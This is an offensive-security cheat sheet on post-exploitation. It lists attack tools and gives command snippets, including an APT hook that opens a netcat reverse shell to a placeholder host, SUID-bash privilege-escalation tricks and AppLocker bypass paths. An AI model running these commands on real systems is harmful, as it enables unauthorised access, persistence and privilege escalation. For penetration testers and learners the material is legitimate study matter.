# Post Exploitation

## Post Exploitation

* [Resources](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Resources)

### Table of Contents

* [accesschk](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#accesschk)
* [ADCSTemplate](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#ADCSTemplate)
* [Apache2](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Apache2)
* [AppLocker](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#AppLocker)
* [APT](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#APT)
* [Bash](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Bash)
* [Bash Debugging Mode](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Bash-Debugging-Mode)
* [BloodHound](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#BloodHound)
* [BloodHound Python](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#BloodHound-Python)
* [Certify](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Certify)
* [Certipy](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Certipy)
* [ClamAV](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#ClamAV)
* [Credentials File](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Credentials-File)
* [dd](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#dd)
* [DNS](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#DNS)
* [enum4linux](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#enum4linux)
* [enum4linux-ng](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#enum4linux-ng)
* [Evil-WinRM](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Evil-WinRM)
* [gdbus](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#gdbus)
* [gem](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#gem)
* [Git](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Git)
* [gMSADumper](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#gMSADumper)
* [grep](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#grep)
* [gsocket](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#gsocket)
* [find](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#find)
* [functions](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#functions)
* [Impacket](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Impacket)
* [Internet Information Service (IIS)](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/edit/main/handbooks/10_post_exploitation.md#Internet-Information-Service-IIS)
* [JAWS](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#JAWS)
* [Kerberos](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Kerberos)
* [Krbrelayx](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Krbrelayx)
* [LAPS](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#LAPS)
* [LDAP](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#LDAP)
* [ldapsearch](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#ldapsearch)
* [LD\_PRELOAD](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#LD_PRELOAD)
* [LD\_LIBRARY\_PATH](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#LD_LIBRARY_PATH)
* [Linux](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Linux)
* [Linux Wildcards](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Linux-Wildcards)
* [logrotten](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#logrotten)
* [Lsass](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Lsass)
* [Lua](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Lua)
* [machinectl](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#machinectl)
* [Microsoft Windows](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Microsoft-Windows)
* [Microsoft Windows Defender](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Microsoft-Windows-Defender)
* [Minimalistic Offensive Security Tools](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Minimalistic-Offensive-Security-Tools)
* [PassTheCert](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#PassTheCert)
* [Path Variable Hijacking](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Path-Variable-Hijacking)
* [pika](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#pika)
* [Ping Sweep](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Ping-Sweep)
* [PKINITtools](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#PKINITtools)
* [plotting](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#plotting)
* [Port Scanning](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Port-Scanning)
* [PoshADCS](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#PoshADCS)
* [powercat](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#powercat)
* [Powermad](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Powermad)
* [PowerShell Constrained Language Mode (CLM)](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#PowerShell-Constrained-Language-Mode-CLM)
* [PowerSploit](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#PowerSploit)
* [PowerView](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#PowerView)
* [PRET](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#PRET)
* [procdump](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#procdump)
* [pspy](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#pspy)
* [pth-toolkit](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#pth-toolkit)
* [pwncat](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#pwncat)
* [Python](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Python)
* [rpcclient](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#rpcclient)
* [Rubeus](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Rubeus)
* [RunasCs](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#RunasCs)
* [SeBackupPrivilege Privilege Escalation (diskshadow)](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#SeBackupPrivilege-Privilege-Escalation-diskshadow)
* [setcap](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#setcap)
* [SharpHound](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#SharpHound)
* [Shell Upgrade](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Shell-Upgrade)
* [Sherlock](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Sherlock)
* [systemctl](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#systemctl)
* [Time Stomping](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Time-Stomping)
* [Universal Privilege Escalation and Persistence Printer](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Universal-Privilege-Escalation-and-Persistence-Printer)
* [User Group Exploitation](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#User-Group-Exploitation)
* [VSS](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#VSS)
* [WDigest](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#WDigest)
* [Whisker](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Whisker)
* [Windows-Exploit-Suggester](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Windows-Exploit-Suggester)
* [winexe](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#winexe)
* [writeDACL](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#writeDACL)

### Resources

| Name                                              | Description                                                                                                                                                                                                                                                                                                                                                 | URL                                                                              |
| ------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------- |
| ADCSKiller - An ADCS Exploitation Automation Tool | An ADCS Exploitation Automation Tool Weaponizing Certipy and Coercer                                                                                                                                                                                                                                                                                        | <https://github.com/grimlockx/ADCSKiller>                                        |
| ADCSTemplate                                      | A PowerShell module for exporting, importing, removing, permissioning, publishing Active Directory Certificate Templates. It also includes a DSC resource for creating AD CS templates using these functions. This was built with the intent of using DSC for rapid lab builds. Could also work in production to move templates between AD CS environments. | <https://github.com/GoateePFE/ADCSTemplate>                                      |
| adPEAS                                            | Powershell tool to automate Active Directory enumeration.                                                                                                                                                                                                                                                                                                   | <https://github.com/61106960/adPEAS>                                             |
| BloodHound                                        | BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory or Azure environment.                                                                                                                                                                                                                       | <https://github.com/BloodHoundAD/BloodHound>                                     |
| BloodHound                                        | Fork of BloodHound with PKI nodes and edges for Certipy along with some minor personal improvements                                                                                                                                                                                                                                                         | <https://github.com/ly4k/BloodHound>                                             |
| BloodHound Docker                                 | BloodHound Docker Ready to Use                                                                                                                                                                                                                                                                                                                              | <https://github.com/belane/docker-bloodhound>                                    |
| BloodHound Python                                 | BloodHound.py is a Python based ingestor for BloodHound, based on Impacket.                                                                                                                                                                                                                                                                                 | <https://github.com/fox-it/BloodHound.py>                                        |
| BloodyAD Framework                                | BloodyAD is an Active Directory Privilege Escalation Framework, it can be used manually using bloodyAD.py or automatically by combining pathgen.py and autobloody.py.                                                                                                                                                                                       | <https://github.com/CravateRouge/bloodyAD>                                       |
| Certify                                           | Active Directory certificate abuse.                                                                                                                                                                                                                                                                                                                         | <https://github.com/GhostPack/Certify>                                           |
| Certipy                                           | Tool for Active Directory Certificate Services enumeration and abuse                                                                                                                                                                                                                                                                                        | <https://github.com/ly4k/Certipy>                                                |
| check\_vulnerabledrivers.ps1                      | A quick script to check for vulnerable drivers. Compares drivers on system with list from loldrivers.io                                                                                                                                                                                                                                                     | <https://gist.github.com/api0cradle/d52832e36aaf86d443b3b9f58d20c01d>            |
| Coercer                                           | A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 9 methods.                                                                                                                                                                                                                                         | <https://github.com/p0dalirius/Coercer>                                          |
| CSExec (a C Sharp psexec implementation)          | An implementation of PSExec in C#                                                                                                                                                                                                                                                                                                                           | <https://github.com/malcomvetter/CSExec>                                         |
| DLLSideloader                                     | PowerShell script to generate "proxy" counterparts to easily perform DLL Sideloading                                                                                                                                                                                                                                                                        | <https://github.com/Flangvik/DLLSideloader>                                      |
| dnsteal                                           | This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.                                                                                                                                                                                                                                           | <https://github.com/m57/dnsteal>                                                 |
| enum4linux                                        | A Linux alternative to enum.exe for enumerating data from Windows and Samba hosts.                                                                                                                                                                                                                                                                          | <https://github.com/CiscoCXSecurity/enum4linux>                                  |
| enum4linux-ng                                     | A next generation version of enum4linux.                                                                                                                                                                                                                                                                                                                    | <https://github.com/cddmp/enum4linux-ng>                                         |
| EvilTree                                          | A python3 remake of the classic "tree" command with the additional feature of searching for user provided keywords/regex in files, highlighting those that contain matches.                                                                                                                                                                                 | <https://github.com/t3l3machus/eviltree>                                         |
| GhostPack-Compiled Binaries                       | Compiled Binaries for Ghostpack (.NET v4.0)                                                                                                                                                                                                                                                                                                                 | <https://github.com/r3motecontrol/Ghostpack-CompiledBinaries>                    |
| GTFOBins                                          | GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.                                                                                                                                                                                                                                | <https://gtfobins.github.io/>                                                    |
| HEKATOMB                                          | Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them.                                                                                                                             | <https://github.com/Processus-Thief/HEKATOMB>                                    |
| Impacket                                          | Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself.                                                                                                             | <https://github.com/fortra/impacket>                                             |
| Impacket Static Binaries                          | Standalone binaries for Linux/Windows of Impacket's examples                                                                                                                                                                                                                                                                                                | <https://github.com/ropnop/impacket\\_static\\_binaries>                         |
| JAWS                                              | JAWS is PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems.                                                                                                                                                                                                     | <https://github.com/411Hall/JAWS>                                                |
| KrbRelay                                          | Framework for Kerberos relaying                                                                                                                                                                                                                                                                                                                             | <https://github.com/cube0x0/KrbRelay>                                            |
| KrbRelayUp                                        | KrbRelayUp - a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).                                                                                                                                                                                                        | <https://github.com/Dec0ne/KrbRelayUp>                                           |
| Krbrelayx                                         | Kerberos unconstrained delegation abuse toolkit                                                                                                                                                                                                                                                                                                             | <https://github.com/dirkjanm/krbrelayx>                                          |
| LAPSDumper                                        | Dumping LAPS from Python                                                                                                                                                                                                                                                                                                                                    | <https://github.com/n00py/LAPSDumper>                                            |
| LinEnum                                           | Privilege Escalation Enumeration                                                                                                                                                                                                                                                                                                                            | <https://github.com/rebootuser/LinEnum>                                          |
| linWinPwn                                         | linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks                                                                                                                                                                                                                                                 | <https://github.com/lefayjey/linWinPwn>                                          |
| LOLAPPS                                           | LOLAPPS is a compendium of applications that can be used to carry out day-to-day exploitation.                                                                                                                                                                                                                                                              | <https://lolapps-project.github.io/#>                                            |
| LOLBAS                                            | The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniques.                                                                                                                                                                                                                        | <https://lolbas-project.github.io/#>                                             |
| LOLDrivers                                        | Living Off The Land Drivers is a curated list of Windows drivers used by adversaries to bypass security controls and carry out attacks. The project helps security professionals stay informed and mitigate potential threats.                                                                                                                              | <https://www.loldrivers.io>                                                      |
| LOOBins                                           | Living Off the Orchard: macOS Binaries (LOOBins) is designed to provide detailed information on various built-in macOS binaries and how they can be used by threat actors for malicious purposes.                                                                                                                                                           | <https://www.loobins.io>                                                         |
| lsassy                                            | Python tool to remotely extract credentials on a set of hosts.                                                                                                                                                                                                                                                                                              | <https://github.com/Hackndo/lsassy>                                              |
| nanodump                                          | LSASS dumper                                                                                                                                                                                                                                                                                                                                                | <https://github.com/helpsystems/nanodump>                                        |
| NTLMRelay2Self                                    | An other No-Fix LPE, NTLMRelay2Self over HTTP (Webdav).                                                                                                                                                                                                                                                                                                     | <https://github.com/med0x2e/NTLMRelay2Self>                                      |
| Obfuscated SharpCollection                        | Attempt at Obfuscated version of SharpCollection                                                                                                                                                                                                                                                                                                            | <https://github.com/Flangvik/ObfuscatedSharpCollection>                          |
| PassTheCert                                       | Proof-of-Concept tool to authenticate to an LDAP/S server with a certificate through Schannel                                                                                                                                                                                                                                                               | <https://github.com/AlmondOffSec/PassTheCert>                                    |
| PEASS-ng                                          | Privilege Escalation Awesome Scripts SUITE new generation                                                                                                                                                                                                                                                                                                   | <https://github.com/carlospolop/PEASS-ng>                                        |
| Ping Castle                                       | Ping Castle is a tool designed to assess quickly the Active Directory security level with a methodology based on risk assessment and a maturity framework.                                                                                                                                                                                                  | <https://github.com/vletoux/pingcastle>                                          |
| PKINITtools                                       | Tools for Kerberos PKINIT and relaying to AD CS                                                                                                                                                                                                                                                                                                             | <https://github.com/dirkjanm/PKINITtools>                                        |
| powercat                                          | Netcat: The powershell version.                                                                                                                                                                                                                                                                                                                             | <https://github.com/besimorhino/powercat>                                        |
| Powermad                                          | PowerShell MachineAccountQuota and DNS exploit tools                                                                                                                                                                                                                                                                                                        | <https://github.com/Kevin-Robertson/Powermad/blob/master/Powermad.ps1>           |
| PowerSharpPack                                    | Many useful offensive CSharp Projects wraped into Powershell for easy usage.                                                                                                                                                                                                                                                                                | <https://github.com/S3cur3Th1sSh1t/PowerSharpPack>                               |
| PowershellKerberos                                | Some scripts to abuse kerberos using Powershell                                                                                                                                                                                                                                                                                                             | <https://github.com/MzHmO/PowershellKerberos>                                    |
| PowerShell-Suite                                  | My musings with PowerShell                                                                                                                                                                                                                                                                                                                                  | <https://github.com/FuzzySecurity/PowerShell-Suite>                              |
| PowerSploit                                       | PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.                                                                                                                                                                                                                 | <https://github.com/PowerShellMafia/PowerSploit>                                 |
| PowerUp                                           | PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.                                                                                                                                                                                                                                           | <https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1> |
| PowerView                                         | PowerView is a PowerShell tool to gain network situational awareness on Windows domains.                                                                                                                                                                                                                                                                    | <https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1> |
| PowerView\.py                                     | PowerView alternative                                                                                                                                                                                                                                                                                                                                       | <https://github.com/aniqfakhrul/powerview.py>                                    |
| PPLdump                                           | Dump the memory of a PPL with a userland exploit                                                                                                                                                                                                                                                                                                            | <https://github.com/itm4n/PPLdump>                                               |
| Priv2Admin                                        | Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.                                                                                                                                                                                                                                                    | <https://github.com/gtworek/Priv2Admin>                                          |
| PSPKIAudit                                        | PowerShell toolkit for AD CS auditing based on the PSPKI toolkit.                                                                                                                                                                                                                                                                                           | <https://github.com/GhostPack/PSPKIAudit>                                        |
| pspy                                              | pspy is a command line tool designed to snoop on processes without need for root permissions.                                                                                                                                                                                                                                                               | <https://github.com/DominicBreuker/pspy>                                         |
| pth-toolkit                                       | A modified version of the passing-the-hash tool collection <https://code.google.com/p/passing-the-hash/> designed to be portable and work straight out of the box even on the most 'bare bones' systems.                                                                                                                                                    | <https://github.com/byt3bl33d3r/pth-toolkit>                                     |
| pwncat                                            | Post-Exploitation Platform                                                                                                                                                                                                                                                                                                                                  | <https://github.com/calebstewart/pwncat>                                         |
| PyWhisker                                         | Python version of the C# tool for "Shadow Credentials" attacks                                                                                                                                                                                                                                                                                              | <https://github.com/ShutdownRepo/pywhisker>                                      |
| Rubeus                                            | Rubeus is a C# toolset for raw Kerberos interaction and abuses.                                                                                                                                                                                                                                                                                             | <https://github.com/GhostPack/Rubeus>                                            |
| RunasCs                                           | RunasCs - Csharp and open version of windows builtin runas.exe                                                                                                                                                                                                                                                                                              | <https://github.com/antonioCoco/RunasCs>                                         |
| RustHound                                         | Active Directory data collector for BloodHound written in rust.                                                                                                                                                                                                                                                                                             | <https://github.com/OPENCYBER-FR/RustHound>                                      |
| scavenger                                         | scavenger is a multi-threaded post-exploitation scanning tool for scavenging systems, finding most frequently used files and folders as well as "interesting" files containing sensitive information.                                                                                                                                                       | <https://github.com/SpiderLabs/scavenger>                                        |
| SCShell                                           | Fileless lateral movement tool that relies on ChangeServiceConfigA to run command                                                                                                                                                                                                                                                                           | <https://github.com/Mr-Un1k0d3r/SCShell>                                         |
| Seatbelt                                          | Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.                                                                                                                                                                                          | <https://github.com/GhostPack/Seatbelt>                                          |
| SeBackupPrivilege                                 | Use SE\_BACKUP\_NAME/SeBackupPrivilege to access objects you shouldn't have access to.                                                                                                                                                                                                                                                                      | <https://github.com/giuliano108/SeBackupPrivilege>                               |
| SharpCollection                                   | Nightly builds of common C# offensive tools, fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.                                                                                                                                                                                          | <https://github.com/Flangvik/SharpCollection>                                    |
| SharpEventPersist                                 | Persistence by writing/reading shellcode from Event Log                                                                                                                                                                                                                                                                                                     | <https://github.com/improsec/SharpEventPersist>                                  |
| SharpExfiltrate                                   | Modular C# framework to exfiltrate loot over secure and trusted channels.                                                                                                                                                                                                                                                                                   | <https://github.com/Flangvik/SharpExfiltrate>                                    |
| SharpHound                                        | C# Data Collector for BloodHound                                                                                                                                                                                                                                                                                                                            | <https://github.com/BloodHoundAD/SharpHound>                                     |
| SharpStay                                         | .NET project for installing Persistence                                                                                                                                                                                                                                                                                                                     | <https://github.com/0xthirteen/SharpStay>                                        |
| Sharp-Suite                                       | Also known by Microsoft as Knifecoat hot\_pepper                                                                                                                                                                                                                                                                                                            | <https://github.com/FuzzySecurity/Sharp-Suite>                                   |
| SharpView                                         | C# implementation of harmj0y's PowerView                                                                                                                                                                                                                                                                                                                    | <https://github.com/tevora-threat/SharpView>                                     |
| Sherlock                                          | PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.                                                                                                                                                                                                                                                  | <https://github.com/rasta-mouse/Sherlock>                                        |
| SMBeagle                                          | SMBeagle - Fileshare auditing tool.                                                                                                                                                                                                                                                                                                                         | <https://github.com/punk-security/smbeagle>                                      |
| static-binaries                                   | This repo contains a bunch of statically-linked binaries of various tools, along with the Dockerfiles / other build scripts that can be used to build them.                                                                                                                                                                                                 | <https://github.com/andrew-d/static-binaries>                                    |
| SUDO\_KILLER                                      | A tool to identify and exploit sudo rules' misconfigurations and vulnerabilities within sudo for linux privilege escalation.                                                                                                                                                                                                                                | <https://github.com/TH3xACE/SUDO\\_KILLER>                                       |
| tickey                                            | Tool to extract Kerberos tickets from Linux kernel keys.                                                                                                                                                                                                                                                                                                    | <https://github.com/TarlogicSecurity/tickey>                                     |
| Villain                                           | Villain is a Windows & Linux backdoor generator and multi-session handler that allows users to connect with sibling servers (other machines running Villain) and share their backdoor sessions, handy for working as a team.                                                                                                                                | <https://github.com/t3l3machus/Villain>                                          |
| WADComs                                           | WADComs is an interactive cheat sheet, containing a curated list of offensive security tools and their respective commands, to be used against Windows/AD environments.                                                                                                                                                                                     | <https://wadcoms.github.io>                                                      |
| Watson                                            | Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities.                                                                                                                                                                                                                                      | <https://github.com/rasta-mouse/Watson>                                          |
| WESNG                                             | WES-NG is a tool based on the output of Windows' systeminfo utility which provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities.                                                                                                                                                                   | <https://github.com/bitsadmin/wesng>                                             |
| Whisker                                           | Whisker is a C# tool for taking over Active Directory user and computer accounts by manipulating their msDS-KeyCredentialLink attribute, effectively adding "Shadow Credentials" to the target account.                                                                                                                                                     | <https://github.com/eladshamir/Whisker>                                          |
| Windows-privesc-check                             | Tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases).                                                                                                                                                                                                   | <https://github.com/pentestmonkey/windows-privesc-check>                         |
| Windows Privilege Escalation Fundamentals         | How-to Windows Privilege Escalation                                                                                                                                                                                                                                                                                                                         | <https://www.fuzzysecurity.com/tutorials/16.html>                                |
| Windows Privilege Escalation                      | Windows privlege escalation methodology                                                                                                                                                                                                                                                                                                                     | <https://github.com/frizb/Windows-Privilege-Escalation>                          |
| WinPwn                                            | Automation for internal Windows Penetrationtest / AD-Security                                                                                                                                                                                                                                                                                               | <https://github.com/S3cur3Th1sSh1t/WinPwn>                                       |
| wmiexec-Pro                                       | New generation of wmiexec.py                                                                                                                                                                                                                                                                                                                                | <https://github.com/XiaoliChan/wmiexec-Pro>                                      |

### accesschk

#### Checking File Permissions

```c
C:\> .\accesschk.exe /accepteula -quvw "C:\PATH\TO\FILE\<FILE>.exe"
```

#### Checking Service Permissions

```c
C:\> .\accesschk.exe /accepteula -uwcqv <USERNAME> daclsvc
```

#### Checking Path Permissions to find Unquoted Service Paths

```c
C:\> .\accesschk.exe /accepteula -uwdq C:\
C:\> .\accesschk.exe /accepteula -uwdq "C:\Program Files\"
C:\> .\accesschk.exe /accepteula -uwdq "C:\Program Files\<UNQUOTED_SERVICE_PATH>"
```

#### Checking Registry Entries

```c
C:\> .\accesschk.exe /accepteula -uvwqk <REGISTRY_KEY>
```

### Apache2

#### Read first Line of a File with apache2 Binary

```c
$ sudo /usr/sbin/apache2 -f <FILE>
```

### AppLocker

> <https://github.com/api0cradle/UltimateAppLockerByPassList>

#### Bypass List (Windows 10 Build 1803)

```c
C:\Windows\Tasks
C:\Windows\Temp
C:\Windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated (after peforming a version upgrade of Windows 10)
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System
```

### APT

```c
$ echo 'apt::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f"};' > /etc/apt/apt.conf.d/<FILE>
```

### Bash

#### SUID Privilege Escalation

```c
$ cp /bin/bash .
$ chmod +s bash
$ bash -p
```

#### White Collar eval Arbitrary Code Execution

> <https://www.vidarholen.net/contents/blog/?p=716>

**Example**

```c
#!/bin/bash
chmod +s /bin/bash
```

```c
'a[$(/tmp/<FILE>.sh>&2)]+42' /tmp/<FILE>.sh
```

### Bash Debugging Mode

* Bash <4.4

```c
$ env -i SHELLOPTS=xtrace PS4='$(chmod +s /bin/bash)' /usr/local/bin/<BINARY>
```

### BloodHound

> <https://github.com/BloodHoundAD/BloodHound>

#### Installation

```c
$ pip install bloodhound
$ sudo apt-get install neo4j
$ sudo apt-get install bloodhound
```

#### Installing and starting Database

```c
$ wget -O - https://debian.neo4j.com/neotechnology.gpg.key | sudo apt-key add -
$ sudo echo 'deb https://debian.neo4j.com stable 4.0' > /etc/apt/sources.list.d/neo4j.list
$ sudo apt-get update
$ sudo apt-get install apt-transport-https
$ sudo apt-get install neo4j
